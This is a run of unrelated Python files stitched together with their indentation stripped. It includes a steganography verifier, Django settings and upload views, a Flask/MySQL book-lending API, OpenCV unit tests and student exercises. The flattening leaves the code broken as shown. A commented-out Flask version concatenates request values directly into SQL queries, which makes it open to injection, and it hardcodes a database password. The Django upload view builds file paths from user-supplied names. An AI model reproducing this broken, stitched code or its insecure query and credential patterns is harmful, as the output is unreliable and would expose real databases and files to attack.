if hexa_table[count_hex] in word: #checks if the word inside the the hexa_table
count_hex += 1
data_found_1 = 'found' #changes the value to found
if data_found_1 == 'found' and len(hexa_table) == count_hex: #checks the condition
return '|'+('-'*68)+'|' + '\n| SUCCESS! |' + '\n| The verification has been successfully accomplished. The data |' + '\n| has been detected inside the selected timecode. |' + '\n|'+('-'*68)+'|'
else:
data_found_1 = 'not_found' #changes the value to not_found
data_found = False
if data_found_1 == 'not_found': #checks the condition
return '|'+('-'*68)+'|' + '\n| UNSUCCESS! |' + '\n| The verification is unsuccessful! The entered text has not |' + '\n| been found. Please, check your text, key, or the timecode again! |' + '\n|'+('-'*68)+'|'
if (accessed_timecode == True) and ('<data>' in line): #skips <data> line
accessed_data = True
return '|'+('-'*68)+'|' + '\n| UNSUCCESS! |' + '\n| The verification is unsuccessful! The entered text has not |' + '\n| been found. Please, check your text, key, or the timecode again! |' + '\n|'+('-'*68)+'|'
def hex_to_ascii(decrypt_x):
'''
uses counter to make sure that 2 values converted to ascii only with spaces
Input: decrypted text in hexadecimal format
Return: converted decrypted text to ascii format
'''
tmp_ascii = ''
ascii_ = ''
count = 0
for i in range(len(decrypt_x)):
count += 1
tmp_ascii += decrypt_x[i]
if count == 2:
ascii_ += str(''.join(chr(int(tmp_ascii[i:i+2], 16)) for i in range(0, len(tmp_ascii), 2))) #hex to text
tmp_ascii = ''
count = 0
return ascii_
def main(file):
#user's input
a_word = input(' Enter the text that you have entered during\n the data hiding process in the following format\n \'word\' and press [ENTER]: ')
k = input('\n Enter the key that you have entered during\n the data hiding process in the following format \n \'key\' and press [ENTER]: ') #encryption key
select_timecode = input('\n Enter the timecode that you have selected during\n the data hiding process in the following format \n \'0.00\' and press [ENTER]: ') #gets encrypted
#when key is smaller than a text, it increases the key size
if len(k) < len(a_word):
k = pumpKey(a_word,k)
#convert to ascii
ascii_a_word = text2ascii(a_word)
ascii_k = text2ascii(k)
#convert to hexadecimal
ascii_a_word = convert2hex(ascii_a_word)
ascii_k = convert2hex(ascii_k)
#if the size of ascii_k is still < ascii_a_word then need to pump
if len(ascii_k) < len(ascii_a_word):
ascii_k = pumpKey(ascii_a_word,ascii_k)
#encrypts the converted to ascii text
encrypt_a_word = encr_ascii(ascii_a_word, ascii_k, a_word)
#convert encrypted text to hexadecimal
hex_list = convert2hex(encrypt_a_word) # calls the function to convert the text to hexadecimal
hexa_word = ''
for i in range(len(hex_list)):
hexa_word += hex_list[i] #gets pure hexadecimal word
print(find_data(file, select_timecode, hexa_word)) #process to find the data
file = sys.argv[1] #runs hidden file
main(file)
|
import os
from .utils import BASE_DIR
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [
os.path.join(BASE_DIR, 'apps', 'canvas_gadget', 'templates'),
os.path.join(BASE_DIR, 'apps', 'feedback', 'templates')
],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
{
'BACKEND': 'django.template.backends.jinja2.Jinja2',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'environment': 'apps.base.jinja2_environment.environment',
'extensions': [
'compressor.contrib.jinja2ext.CompressorExtension',
'jinja2.ext.i18n',
'jinja2.ext.with_',
],
}
},
] |
import os
from django import forms
from django.shortcuts import render
from django.core.urlresolvers import reverse
from django.http import HttpResponseRedirect, HttpResponse
from django.contrib.auth.decorators import login_required
from django.contrib.auth import authenticate, login, logout
from .forms import UploadFileForm, FileTable, File
from cloud.settings import MEDIA_URL, MEDIA_ROOT
# from django.views.generic.edit import FormView
# class FileFieldView(FormView):
# form_class = UploadFileForm
# template_name = 'upload.html' # Replace with your template.
# success_url = 'index.html' # Replace with your URL or reverse().
#
# def post(self, request, *args, **kwargs):
# print("HERE")
# form_class = self.get_form_class()
# form = self.get_form(form_class)
# files = request.FILES.getlist('file_field')
# if form.is_valid():
# for f in files:
# request.user.profile.files.append(f)
# print(f)
# request.user.save()
#
# return self.form_valid(form)
# else:
# return self.form_invalid(form)
def index(request):
if request.user.is_active:
return welcome(request)
else:
return render(request, 'index.html')
def upload(request):
if request.method == 'POST':
form = UploadFileForm(request.POST, request.FILES)
if form.is_valid():
files = request.FILES.getlist('file_field')
for f in files:
file = File(f)
path = os.path.join(MEDIA_ROOT, request.user.username)
if not os.path.exists(path):
os.mkdir(path)
path = os.path.join(path, file.name)
with open(path, 'wb+') as destination:
for chunk in f.chunks():
destination.write(chunk)
if not file in request.user.profile.files:
request.user.profile.files.append(file)
request.user.save()
return index(request)
else:
form = UploadFileForm()
return render(request, 'upload.html', context={'user': request.user, 'form': UploadFileForm})
def welcome(request):
data = []
for file in request.user.profile.files:
data.append({'name': file.name, 'date': file.date})
table = FileTable(data)
print(table)
return render(request, 'welcome.html', context={'user': request.user, 'table': table})
def user_login(request):
if request.method == 'POST':
username = request.POST.get('username')
password = request.POST.get('password')
user = authenticate(username = username, password = password)
if user:
if user.is_active:
login(request, user)
return HttpResponseRedirect(reverse('index'))
else:
return HttpResponse("Account not active")
else:
return HttpResponse("Invalid login details.")
else:
return render(request, 'index.html')
@login_required
def user_logout(request):
logout(request)
return HttpResponseRedirect(reverse('index'))
@login_required
def user_account(request):
if request.method == 'POST':
old = request.POST.get('password')
password = request.POST.get('password_n')
password_conf = request.POST.get('password_nconf')
if password != password_conf:
raise(forms.ValidationError("The two password fields must match."))
if not authenticate(username = request.user.username, password = old):
raise(forms.ValidationError("Old and new password do not match."))
else:
request.user.set_password(password)
request.user.save()
return index(request)
username = request.user.username
return render(request, 'account.html', context={'user': request.user})
|
from flask import Flask, jsonify, request
import mysql.connector
#from flaskext import MySQL
from flask_mysqldb import MySQL
from datetime import datetime
app = Flask(__name__)
#Verbindung mit der Datenbank
app.config['MYSQL_HOST']= 'localhost'
app.config['MYSQL_USER']= 'Bob'
app.config['MYSQL_PASSWORD']= ''
app.config['MYSQL_DB']= 'Buecherverwaltung'
mysql= MySQL(app)
#hier füge ich key und values miteinander so, dass die Dekodierung als Json bei dem Frontend leichter wird
# modeller:("id","email","passwort") / ("id", "titel", "autor", "verlag", "erscheinungsjahr", "status")
def prepareforJSON(listFromDB, modeller):
final_list = []
for first in listFromDB:
final_list.append(dict(zip(modeller, first)))
return final_list
def checker_Contains(liste_db,parameter_1,parameter_2):
my_list =[]
for i in liste_db:
if (i[1] == parameter_1 and i[2] == parameter_2):
my_list.append((i[1], i[2]))
# wenn die angegebenen Parameter mit den Inhalten von der DATENBANKEN überstimmen
if (len(my_list) > 0):
res='yes'
else:
res='no'
return res
# wir chcecken hier, ob das Buch schon ausgeliehen ist, wenn ja retrun => True, wenn nein return => False
def checkStatus(query,id):
res = list()
for i in query:
if i[0] == id and i[5]=='in':
res.append(i)
if len(res) >0:
checker= 'free'
else:
checker= 'not free'
return checker
# wir checken hier, ob der User erstens das Buch schon ausgeliehen hast, wenn ja => True, dann kann er das Buch zurückgeben,
# aber wenn nein => False, kann er das Buch nicht zurückgeben
def checkerUser(query,id, email):
res = list()
for i in query:
if i[0] == id and i[5]== email:
res.append(i)
print(res)
if len(res) >0:
checker= True
else:
checker= False
return checker
#Aufruf aller User , wenn es geprüft wird, ob der User im System existiert
@app.route('/api/users', methods=['GET'])
def all_users():
cur = mysql.connection.cursor()
cur.execute("SELECT * FROM users")
result = cur.fetchall()
cur.close()
modeller=("id", "email", "passwort")
final_result= prepareforJSON(result,modeller)
#return result
return jsonify(final_result)
# json file von Frontend beinhaltet (email und passwort), und dann wird der User in der Datenbank hinzugefügt
@app.route('/api/register', methods=['POST'])
def add_user():
data= request.get_json()
email = data['email']
passwort = data['passwort']
cur = mysql.connection.cursor()
cur.execute("SELECT * FROM users")
list_users= cur.fetchall()
if (checker_Contains(list_users,email,passwort)== 'no'):
cur.execute("INSERT INTO users (email, passwort) VALUES (%s, %s)", (email, passwort))
mysql.connection.commit()
cur.close()
result = {'message': 'register done', 'email' : email}
else:
result = {'message': 'register fail'}
return jsonify(result)
# login() function nur wenn der User wirklich im System existiert
@app.route('/api/login', methods=['POST'])
def login():
data = request.get_json()
email = data['email']
passwort= data['passwort']
cur = mysql.connection.cursor()
#cur.execute("SELECT * FROM users where email= %s", str(email) ) # ich nutze nur Email hier, weil die Emails in der Datenbanken als 'unique' sein muüssen
cur.execute("SELECT * FROM users")
list_users = cur.fetchall()
cur.close()
# ich checke in der Liste von allen User, ob der angegebenen Resquest(email and user ) in unserm System existiert
#und wenn ja wird eine message mit 'done', wenn nein mit message 'fail'
if(checker_Contains( list_users,email,passwort) == 'no'):
result = {'message': 'login fail'}
else:
result = {'message': 'login done', 'email' : email}
# wenn die Daten von User in der Liste steht => done
# wenn nicht, => fail
return jsonify(result)
#Aufruf aller User , wenn sie gefragt werden
@app.route('/api/all_Buch', methods=['GET'])
def all_buch():
cur = mysql.connection.cursor()
cur.execute("SELECT * FROM buecher")
result = cur.fetchall()
cur.close()
modeller = ("id", "titel", "autor", "verlag", "erscheinungsjahr", "status")
#modeller = {"status", "titel", "id", "verlag", "titel", "erscheinungsjahr"}
final_result = prepareforJSON(result,modeller)
return jsonify(final_result)
# man fügt ein neues Buch in der Datenbank (im System) hinzu
#Wir erwarten hier : titel, autor, verlag und ercheinungsjahr
@app.route('/api/add_buch', methods=['POST'])
def hinzufügen_buch():
data = request.get_json()
titel= data['titel']
autor= data['autor']
verlag= data['verlag']
date_str= data['erscheinungsjahr']
erscheinungsjahr = datetime.strptime(date_str, '%m-%d-%Y').date()
val = (titel, autor, verlag, erscheinungsjahr)
cur = mysql.connection.cursor()
#Hier checke ich erstens, ob das Buch schon im System existiert (=> mit gleichen Eigenschaften)
cur.execute("SELECT * FROM buecher")
list_buecher = cur.fetchall()
if (checker_Contains(list_buecher,titel,autor) == 'no'):
cur.execute("INSERT INTO buecher (titel,autor, verlag, erscheinungsjahr) VALUES (%s,%s,%s,%s)",
(titel, autor, verlag, erscheinungsjahr))
mysql.connection.commit()
cur.close()
result = {'message': 'Buch added'}
else:
result= {'message': 'Buch already exists'} # wenn das Buch schon existiert , wird das System 'already' schicken
return jsonify(result)
# Hier wird nur das ID des Buchs bekommen und dank diesem id wird das Buch mit ementsprechenden ID in der Datenbank (im System ) gelöscht
# Nur id des Buchs wird beim Löschen erwartet
@app.route('/api/delete_buch', methods=['POST'])
def delet_buch():
data = request.get_json()
id= data['id']
cur = mysql.connection.cursor()
#response=cur.execute("DELETE FROM buecher where id = " + str(id) )
response = cur.execute("DELETE FROM buecher where id = %s ", (id,) )
# ALTER TABLE buecher AUTO_INCREMENT = id damit das 'id'- des Buchs für neue Bücher verfügbar wird
#response_1= cur.execute("ALTER TABLE buecher AUTO_INCREMENT = " + str(id) )
response_1 = cur.execute("ALTER TABLE buecher AUTO_INCREMENT = %s ", (id,) )
mysql.connection.commit()
cur.close()
# wenn das Delete funktioniert, dann wird 'response = 1 '
if response > 0:
result = {'message': 'buch deleted'}
#result = {'message': 'buch deleted', 'response': response}
else:
result = {'message': 'buch not exist'}
return jsonify( result )
#noch nicht gut
# id -buch und email des Users werden erwartet
@app.route('/api/buch_out', methods=['PUT'])
def ausleihen():
data = request.get_json()
email= data['email']
id= data['id']
# im System sind 02 status zu erkenen: 'in': neues Buch oder zurückgegeben und dann einfach die email-adresse (von der User , der das Buch ausgeliehen hast )
# hier kriegen wir eine Liste von allen Buecher (id, titel,autor,verlag,erscheinungsjahr, status )
cur = mysql.connection.cursor()
#response= cur.execute("SELECT * FROM buecher WHERE status = %s " , email )
cur.execute("SELECT * FROM buecher")
myresult = cur.fetchall()
# hier rechnen wir einfach nur wie viel Bücher den User schon ausgeliehen hat und vergleichen wir, ob das unter 4 ist
list_out = []
for each_list in myresult:
# position_status[5] : denn in der Tabelle buehcer ist status in der 6. Spalte
# print(each_list)
status = each_list[5]
# print(status)
if status == email: # nur email weil die Email 'unique' sind.
list_out.append(status)
# wenn der User(mitgilfe seiner Email) unter 4 Bücher ausgeliehen hat, dann aktualisieren wir den Status des Buchs im System mit seinem email.
if len(list_out )< 3 and checkStatus(myresult,int(id) )== 'free':
# cur.execute("UPDATE buecher SET stauts = %s WHERE id = %s ", (email, id))
response = cur.execute("UPDATE buecher SET status = %s WHERE id = %s ", (email, id))
mysql.connection.commit()
cur.close()
# ich schicken hier 'done' als response wenn die Function ausleihen funktioniert hat und wenn nicht 'fail'
#result = {'ausgeliehen': 'done'}
if response > 0:
result_1 = {'ausgeliehen': 'done'}
else:
result_1 = {'ausgeliehen': 'fail'}
result = result_1
else:
result = {'ausgeliehen': ' max 3 books'}
return jsonify(result)
#noch nicht gut
# Nur id -buch wird erwartet
@app.route('/api/buch_in', methods=['PUT'])
def zurueckgeben():
data = request.get_json()
id= data['id']
email= data['email']
status='in'
cur = mysql.connection.cursor()
cur.execute("SELECT * FROM buecher")
query= cur.fetchall()
if checkerUser(query,id,email)== True :
response= cur.execute("UPDATE buecher SET status= %s WHERE id = %s ",(status, id) )
mysql.connection.commit()
cur.close()
if response > 0:
result_1 = {'zurueckgegeben': 'done'}
else:
result_1 = {'zurueckgegeben': 'fail'}
result= result_1
else:
result= {'zurueckgegeben': 'not the same user'}
return jsonify(result)
if __name__ == '__main__':
app.run(port=5001, debug=True)
# test mit mysql.connector , also für normales python nutzung ohne Flask
"""
from flask import Flask, jsonify, request
import mysql.connector
from datetime import datetime
app = Flask(__name__)
#Verbindung mit der Datenbank
mydb = mysql.connector.connect(
host='localhost',
user='Bob',
passwd='Iamusing24@',
)
# json file von Frontend beinhaltet (email und passwort), und dann wird der User in der Datenbank hinzugefügt
@app.route('/api/addUser', methods=['POST'])
def add_user():
data= request.get_json()
email = data['email']
passwort = data['passwort']
mycursor = mydb.cursor()
sql = "INSERT INTO buecherverwaltung.users (email, passwort) VALUES (%s, %s)"
val = (email, passwort)
mycursor.execute(sql, val)
mydb.commit()
result={'message':'done'}
return jsonify(data)
# login() function nur wenn der User wirklich im System existiert
@app.route('/api/login', methods=['POST'])
def login():
data = request.get_json()
email = data['email']
passwort= data['passwort']
mycursor = mydb.cursor()
mycursor.execute("SELECT * FROM buecherverwaltung.buecher where status=" + email)
myresult = mycursor.fetchall()
# ich checke in der Liste von allen User, ob der angegebenen Resquest(email and user ) in unserm System existiert
#und wenn ja wird eine message mit 'done', wenn nein mit message 'fail'
my_list = []
for i in myresult:
if (i[1] == email and i[2] == passwort):
my_list.append((i[1], i[2]))
# wenn die Daten von User in der Liste steht => done
# wenn nicht, => fail
if( len( my_list) >0 ):
result = {'message': 'done'}
return jsonify(result)
else:
result = {'message': 'fail'}
return jsonify(result)
#Aufruf aller User , wenn es geprüft wird, ob der User im System existiert
@app.route('/api/all_Users', methods=['GET'])
def all_users():
mycursor = mydb.cursor()
mycursor.execute("SELECT * FROM users")
myresult = mycursor.fetchall()
#print(myresult)
return jsonify(myresult)
#Aufruf aller User , wenn sie gefragt werden
@app.route('/api/all_Buch', methods=['GET'])
def all_buch():
mycursor = mydb.cursor()
mycursor.execute("SELECT * FROM buecherverwaltung.buecher")
myresult = mycursor.fetchall()
return jsonify(myresult)
# man fügt ein neues Buch in der Datenbank (im System) hinzu
#Wir erwarten hier : titel, autor, verlag und ercheinungsjahr
@app.route('/api/add_buch', methods=['POST'])
def hinzufügen_buch():
data = request.get_json()
titel= data['titel']
autor= data(['autor'])
verlag= data(['verlag'])
date_str= data(['ercheinungsjahr'])
ercheinungsjahr = datetime.strptime(date_str, '%m-%d-%Y').date()
mycursor = mydb.cursor()
sql = "INSERT INTO buecherverwaltung.buecher (titel,autor, verlag, ercheinungsjahr) VALUES (%s, %s,%s,,%s,)"
val = (titel,autor,verlag, ercheinungsjahr )
mycursor.execute(sql, val)
mydb.commit()
result = {'message': 'done'}
return jsonify(result)
# Hier wird nur das ID des Buchs bekommen und dank diesem id wird das Buch mit ementsprechenden ID in der Datenbank (im System ) gelöscht
# Nur id des Buchs wird beim Löschen erwartet
@app.route('/api/one_buch/', methods=['POST'])
def delet_buch():
data = request.get_json()
id= data['id']
mycursor = mydb.cursor()
response=mycursor.execute("DELETE FROM buecherverwaltung.buecher where id= "+id )
mydb.commit()
if response > 0:
result = {'message': 'record delete'}
else:
result = {'message': 'no record found'}
return jsonify({'result': result})
# id -buch und email des Users werden erwartet
@app.route('/api/status/out', methods=['POST'])
def ausleihen():
data = request.get_json()
email= data['email']
id= data['id']
# im System sind 02 status zu erkenen: 'in': neues Buch oder zurückgegeben und dann einfach die email-adresse (von der User , der das Buch ausgeliehen hast )
# hier kriegen wir eine Liste von allen Buecher (id, titel,autor,verlag,erscheinungsjahr, status )
mycursor = mydb.cursor()
mycursor.execute("SELECT * FROM buecherverwaltung.buecher where status="+email)
myresult = mycursor.fetchall()
# hier rechnen wir einfach nur wie viel Bücher den User schon ausgeliehen hat und vergleichen wir, ob das unter 4 ist
list_out=[]
for i in myresult:
#position_status[5] : denn in der Tabelle buehcer ist status in der 6. Spalte
position_status = i[5]
if position_status == email :
list_out.append(position_status)
# wenn der User(mitgilfe seiner Email) unter 4 Bücher ausgeliehen hat, dann aktualisieren wir den Status des Buchs im System mit seinem email.
if len(list_out <4 ):
mycursor.execute("UPDATE buecherverwaltung.buecher SET stauts=' "+str(email)+" ' WHERE id=" +id )
mydb.commit()
#ich schicken hier 'done' als response wenn die Function ausleihen funktioniert hat und wenn nicht 'fail'
result= {'ausgeliehen': 'done' }
return jsonify(result)
else:
result = {'ausgeliehen': 'fail'}
return jsonify(result)
# Nur id -buch wird erwartet
@app.route('/api/status/in', methods=['POST'])
def zurueckgeben():
data = request.get_json()
id= data['id']
mycursor = mydb.cursor()
mycursor.execute("UPDATE buecherverwaltung.buecher SET stauts=' " + str('in') + " ' WHERE id=" + id)
mydb.commit()
result= {'zurueckgegeben':'done'}
return jsonify(result)
if __name__ == '__main__':
app.run(port=5001, debug=True)
"""
|
def biggest(num1,num2,num3):
if num1>num2 and num2>num3:
return num1
elif num2>num3:
return num2
else:
max=num3
return num3
num1=int(input("enter the number1:"))
num2=int(input("enter the number2:"))
num3=int(input("enter the number3:"))
print(biggest(num1,num2,num3))
|
import cv2 as cv2
import unittest
import getlines
import skew
import extract
import math
##WHAT THESE TESTS DO:
# The first twelve test classes represent different image inputs to the functions within
# getlines.py and skew.py, which represent the two facets of our processing algorithm.
# The tests within classes:
# -test_merge_text: tests basic requirement of getlines.isolateLines (which is our line
# getting function comprised of our home-cooked combination of opencv methods), that
# our chosen combination of image-processing methods reduces the number of contours
# (simplifies) the image.
# -test_text_area_dilation: tests more specific requirement of getlines.getLines, that
# the number of identified lines through our line-getting function are accurate to what
# we observe to be the number of lines in the actual image (to within an acceptable
# discrepancy)
# -test_calculate_angle: tests skew.rotate/skew.straighten to make sure that the skew
# angle detected by our skew.py functions is equal to the skew angle we observe in the
# image (to within an acceptable discrepancy).
#
# The last two test classes represent different .pdf inputs to the functions within
# extract.py, which represents the processing functionality of page-splitting (splitting
# a multi-page .pdf document into its separate images)
# Tests within class:
# -test_extract_images: tests that extract.extractImages returns the number of images
# that are observed in the document
class all_white_test_case(unittest.TestCase):
def setUp(self):
#all white image
self.image = cv2.imread("testimg/white.jpg")
self.lines = getlines.getLines(self.image)
def test_merge_text(self):
#makes sure number of contours is decreasing through processing
after_len = len(cv2.findContours(getlines.isolateLines(self.image), cv2.RETR_LIST, cv2.CHAIN_APPROX_SIMPLE)[0])
before_len = len(cv2.findContours(cv2.cvtColor(self.image, cv2.COLOR_BGR2GRAY), cv2.RETR_LIST, cv2.CHAIN_APPROX_SIMPLE)[0])
self.assertTrue(after_len <= before_len)
def test_text_area_dilation(self):
#compares number of detected lines to number we observe to make sure they are equal
self.assertTrue(len(self.lines) == 0)
#cases with no lines will be presumed to be straight, no rotational testing
class all_black_test_case(unittest.TestCase):
def setUp(self):
#all black image
self.image = cv2.imread("testimg/black.jpg")
self.lines = getlines.getLines(self.image)
def test_merge_text(self):
#makes sure number of contours is decreasing through processing
after_len = len(cv2.findContours(getlines.isolateLines(self.image), cv2.RETR_LIST, cv2.CHAIN_APPROX_SIMPLE)[0])
before_len = len(cv2.findContours(cv2.cvtColor(self.image, cv2.COLOR_BGR2GRAY), cv2.RETR_LIST, cv2.CHAIN_APPROX_SIMPLE)[0])
self.assertTrue(after_len <= before_len)
def test_text_area_dilation(self):
#compares number of detected lines to number we observe to make sure they are equal
self.assertTrue(len(self.lines) == 0)
#cases with no lines will be presumed to be straight, no rotational testing
class one_picture_test_case(unittest.TestCase):
def setUp(self):
#one picture image
self.image = cv2.imread("testimg/image.jpg")
self.lines = getlines.getLines(self.image)
def test_merge_text(self):
#makes sure number of contours is decreasing through processing
after_len = len(cv2.findContours(getlines.isolateLines(self.image), cv2.RETR_LIST, cv2.CHAIN_APPROX_SIMPLE)[0])
before_len = len(cv2.findContours(cv2.cvtColor(self.image, cv2.COLOR_BGR2GRAY), cv2.RETR_LIST, cv2.CHAIN_APPROX_SIMPLE)[0])
self.assertTrue(after_len <= before_len)
def test_text_area_dilation(self):
#compares number of detected lines to number we observe to make sure they are equal
print len(self.lines)
self.assertTrue(abs(len(self.lines) - 0) < 2)
#cases with no lines will be presumed to be straight, no rotational testing
class perfect_text_test_case(unittest.TestCase):
def setUp(self):
#one picture image
self.image = cv2.imread("testimg/perfecttext.jpg")
self.lines = getlines.getLines(self.image)
def test_merge_text(self):
#makes sure number of contours is decreasing through processing
after_len = len(cv2.findContours(getlines.isolateLines(self.image), cv2.RETR_LIST, cv2.CHAIN_APPROX_SIMPLE)[0])
before_len = len(cv2.findContours(cv2.cvtColor(self.image, cv2.COLOR_BGR2GRAY), cv2.RETR_LIST, cv2.CHAIN_APPROX_SIMPLE)[0])
self.assertTrue(after_len <= before_len)
def test_text_area_dilation(self):
#compares number of detected lines to number we observe to make sure they are equal
self.assertTrue((len(self.lines) - 18) < 5 and (len(self.lines) - 18) >= 0)
def test_calculate_angle(self):
#compares calculated angle to observed angle to make sure they are equal
img, angle = skew.straighten(cv2.cvtColor(self.image, cv2.COLOR_BGR2GRAY))
self.assertTrue(abs(angle) < 10)
class text_photo_test_case(unittest.TestCase):
def setUp(self):
#one picture image
self.image = cv2.imread("testimg/textphoto.jpg")
self.lines = getlines.getLines(self.image)
def test_merge_text(self):
#makes sure number of contours is decreasing through processing
after_len = len(cv2.findContours(getlines.isolateLines(self.image), cv2.RETR_LIST, cv2.CHAIN_APPROX_SIMPLE)[0])
before_len = len(cv2.findContours(cv2.adaptiveThreshold(cv2.cvtColor(self.image, cv2.COLOR_BGR2GRAY),255,cv2.ADAPTIVE_THRESH_GAUSSIAN_C,\
cv2.THRESH_BINARY, 11, 2), cv2.RETR_LIST, cv2.CHAIN_APPROX_SIMPLE)[0])
self.assertTrue(after_len <= before_len)
def test_text_area_dilation(self):
#compares number of detected lines to number we observe to make sure they are equal
self.assertTrue((len(self.lines) - 15) < 5 and (len(self.lines) - 15) >= 0)
def test_calculate_angle(self):
#compares calculated angle to observed angle to make sure they are equal
img, angle = skew.straighten(cv2.cvtColor(self.image, cv2.COLOR_BGR2GRAY))
self.assertTrue(abs(angle - 0) < 10)
class picture_and_text_test_case(unittest.TestCase):
def setUp(self):
#one picture image
self.image = cv2.imread("testimg/perfecttextwithimage.jpg")
self.lines = getlines.getLines(self.image)
def test_text_area_dilation(self):
#compares number of detected lines to number we observe to make sure they are equal
self.assertTrue((len(self.lines) - 35) < 5 and (len(self.lines) - 35) >= 0)
def test_calculate_angle(self):
#compares calculated angle to observed angle to make sure they are equal
img, angle = skew.straighten(cv2.cvtColor(self.image, cv2.COLOR_BGR2GRAY))
self.assertTrue(abs(angle - 0) < 2)
class different_sized_test_case(unittest.TestCase):
def setUp(self):
#one picture image
self.image = cv2.imread("testimg/strangeformatting.jpg")
self.lines = getlines.getLines(self.image)
self.img, self.angle = skew.straighten(cv2.cvtColor(self.image, cv2.COLOR_BGR2GRAY))
def test_merge_text(self):
#makes sure number of contours is decreasing through processing
after_len = len(cv2.findContours(getlines.isolateLines(self.image), cv2.RETR_LIST, cv2.CHAIN_APPROX_SIMPLE)[0])
before_len = len(cv2.findContours(cv2.cvtColor(self.image, cv2.COLOR_BGR2GRAY), cv2.RETR_LIST, cv2.CHAIN_APPROX_SIMPLE)[0])
self.assertTrue(after_len <= before_len)
def test_text_area_dilation(self):
#compares number of detected lines to number we observe to make sure they are equal
self.assertTrue((len(self.lines) - 37) < 5 and (len(self.lines) - 37) >= 0)
class skewed_pAndT_test_case(unittest.TestCase):
def setUp(self):
#one picture image
self.image = cv2.imread("testimg/rotatedwithimage.jpg")
self.img, self.angle = skew.straighten(cv2.cvtColor(self.image, cv2.COLOR_BGR2GRAY))
self.lines = getlines.getLines(self.img)
def test_text_area_dilation(self):
#compares number of detected lines to number we observe to make sure they are equal
self.assertTrue((len(self.lines) - 35) < 5 and (len(self.lines) - 35) >= 0)
def test_calculate_angle(self):
#compares calculated angle to observed angle to make sure they are equal
self.assertTrue(abs(self.angle - 15) < 2)
class skewed_text_test_case(unittest.TestCase):
def setUp(self):
#one picture image
self.image = cv2.imread("testimg/rotated.jpg")
self.img, self.angle = skew.straighten(cv2.cvtColor(self.image, cv2.COLOR_BGR2GRAY))
self.lines = getlines.getLines(self.img)
def test_text_area_dilation(self):
#compares number of detected lines to number we observe to make sure they are equal
self.assertTrue((len(self.lines) - 18) < 5 and (len(self.lines) - 18) >= 0)
def test_calculate_angle(self):
#compares calculated angle to observed angle to make sure they are equal
self.assertTrue(abs(self.angle + 15) < 2)
## added for iteration 2
class noisy_text1(unittest.TestCase):
def setUp(self):
#text with background noise (from newspaper)
self.image = cv2.imread("testimg/noisy1fixed.jpg")
self.img, self.angle = skew.straighten(cv2.cvtColor(self.image, cv2.COLOR_BGR2GRAY))
self.lines = getlines.getLines(self.img)
def test_text_area_dilation(self):
#compares number of detected lines to number we observe to make sure they are equal
print len(self.lines)
self.assertTrue((len(self.lines) - 20) < 5 and (len(self.lines) - 20) >= 0)
def test_calculate_angle(self):
#compares calculated angle to observed angle to make sure they are equal
self.assertTrue(abs(self.angle - 3) < 10)
class noisy_text2(unittest.TestCase):
def setUp(self):
#text with one-area noise (from bent corner)
self.image = cv2.imread("testimg/noisy2fixed.jpg")
self.img, self.angle = skew.straighten(cv2.cvtColor(self.image, cv2.COLOR_BGR2GRAY))
self.lines = getlines.getLines(self.img)
def test_text_area_dilation(self):
#compares number of detected lines to number we observe to make sure they are equal
print len(self.lines)
self.assertTrue(abs(len(self.lines) - 42) < 5)
def test_calculate_angle(self):
#compares calculated angle to observed angle to make sure they are equal
self.assertTrue(abs(self.angle + 2) < 2)
class black_margins(unittest.TestCase):
def setUp(self):
#text with large amount of black space from copier error
self.image = cv2.imread("testimg/blackmarginsfixed.jpg")
self.img, self.angle = skew.straighten(cv2.cvtColor(self.image, cv2.COLOR_BGR2GRAY))
self.lines = getlines.getLines(self.img)
def test_text_area_dilation(self):
#compares number of detected lines to number we observe to make sure they are equal
self.assertTrue((len(self.lines) - 53) < 5 and (len(self.lines) - 53) >= 0)
def test_calculate_angle(self):
#compares calculated angle to observed angle to make sure they are equal
self.assertTrue(abs(self.angle - 2) < 2)
class long_pdf(unittest.TestCase):
def setUp(self):
#specify file path for pdf with 57 images
self.filepath = "testimg/Biagioli_GalileoCourtier.PDF"
def test_extract_images(self):
#compares number of images extracted from pdf to number we observe to make sure they are equal
self.assertTrue(len(extract.extractImages(self.filepath)) == 57)
class empty_pdf(unittest.TestCase):
def setUp(self):
#specify file path for pdf with 0 images
self.filepath = "testimg/empty.pdf"
def test_extract_images(self):
#compares number of images extracted from pdf to number we observe to make sure they are equal
self.assertTrue(len(extract.extractImages(self.filepath)) == 0)
if __name__ == '__main__':
unittest.main()
|
import datetime
x=datetime.datetime.now()
print(x)
x=datetime.datetime.now()
print(x.year)
print(x.strftime("%A"))
x=datetime.datetime(2019,9,19)
print(x)
x=datetime.datetime(2019,9,19)
print(x.strftime("%B"))
|
import command
class Loop(command.Command):
def execute(self, env):
body = env.qframe.popleft()
resp = body.execute_loop(env)
if resp == command.LOOP_TERMINATE:
return command.NO_TERMINATE
elif resp == command.FUNC_TERMINATE:
return command.FUNC_TERMINATE
class RIfBreak(command.Command):
def execute(self, env):
if env.rqueue is None:
raise exceptions.QQError("Register queue is not allocated")
cond = bool(env.rqueue.pop().value)
if cond:
return command.LOOP_TERMINATE
class Break(command.Command):
def execute(self, env):
return command.LOOP_TERMINATE
|
# Kazi Shadman Sakib
# Roll : 097
import socket
import random
def errorInserted(encodedVoltageStream):
length = len(encodedVoltageStream)
while(1):
i = random.randint(0,length)
if(encodedVoltageStream[i] != " " and encodedVoltageStream[i] != "5" and encodedVoltageStream[i] != "V"):
if(encodedVoltageStream[i] == "+"):
print("Randomly changed positive level, " + encodedVoltageStream[i])
encodedVoltageStream = encodedVoltageStream[:i] + '-' + encodedVoltageStream[i+1:]
print("To a negative level, " + encodedVoltageStream[i])
break
elif(encodedVoltageStream[i] == "-"):
print("Randomly changed negative level, " + encodedVoltageStream[i])
encodedVoltageStream = encodedVoltageStream[:i] + '+' + encodedVoltageStream[i+1:]
print("To a positive level, " + encodedVoltageStream[i])
break
return encodedVoltageStream
def encode(parityBitStream):
outputStream = ""
length = len(parityBitStream)
for i in range(length):
if(parityBitStream[i] == "0"):
if(i == length-1):
outputStream = outputStream + "+5V -5V"
else:
outputStream = outputStream + "+5V -5V "
elif(parityBitStream[i] == "1"):
if(i == length-1):
outputStream = outputStream + "-5V +5V"
else:
outputStream = outputStream + "-5V +5V "
else:
outputStream = "Incorrect bit stream"
break
return outputStream
def parityCheck(bitStream):
n = len(bitStream)
n = n/8
rows, cols = (int(n),8)
arr = []
k = 0
